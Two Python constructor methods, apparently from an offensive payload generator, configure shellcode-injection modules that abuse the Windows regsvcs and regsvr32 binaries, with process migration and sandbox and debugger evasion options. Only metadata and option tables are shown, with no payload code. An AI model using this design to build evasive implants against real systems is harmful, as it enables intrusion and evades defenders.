def __init__(self, cli_obj): # required self.language = "regsvcs" self.extension = "cs" self.rating = "Excellent" self.description = "regsvcs C# VirtualAlloc method for inline shellcode injection" self.name = "regsvcs C# Flat Shellcode Injector" self.path = "regsvcs/shellcode_inject/base64" self.shellcode = shellcode_help.Shellcode(cli_obj) self.cli_opts = cli_obj self.payload_source_code = '' if cli_obj.msfvenom is not None: self.payload_type = cli_obj.msfvenom elif not cli_obj.tool: self.payload_type = '' self.cli_shellcode = False # options we require user ineraction for- format is {OPTION : [Value, Description]]} self.required_options = { "COMPILE_TO_DLL" : ["Y", "Compile to a DLL"], "INJECT_METHOD" : ["Heap", "Virtual or Heap"], "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days"], "HOSTNAME" : ["X", "Optional: Required system hostname"], "DOMAIN" : ["X", "Optional: Required internal domain"], "PROCESSORS" : ["X", "Optional: Minimum number of processors"], "TIMEZONE" : ["X", "Optional: Check to validate not in UTC"], "USERNAME" : ["X", "Optional: The required user account"], "DEBUGGER" : ["X", "Optional: Check if debugger is attached"], "SLEEP" : ["X", "Optional: Sleep \"Y\" seconds, check if accelerated"] }
def __init__(self, cli_obj): # required self.language = "regsvr32" self.extension = "sct" self.rating = "Excellent" self.description = "Regsvr32 DotNetToJScript Shellcode Injection with Process Migration" self.name = "Regsvr32 Shellcode Injection with Process Migration" self.path = "regsvr32/shellcode_inject/base64_migrate" self.shellcode = shellcode_help.Shellcode(cli_obj) self.cli_opts = cli_obj self.payload_source_code = '' if cli_obj.msfvenom is not None: self.payload_type = cli_obj.msfvenom elif not cli_obj.tool: self.payload_type = '' self.cli_shellcode = False # options we require user ineraction for- format is {OPTION : [Value, Description]]} self.required_options = { "PROCESS": ["userinit.exe", "Any process from System32/SysWOW64"], "SCRIPT_TYPE": ["JScript", "JScript or VBScript"] }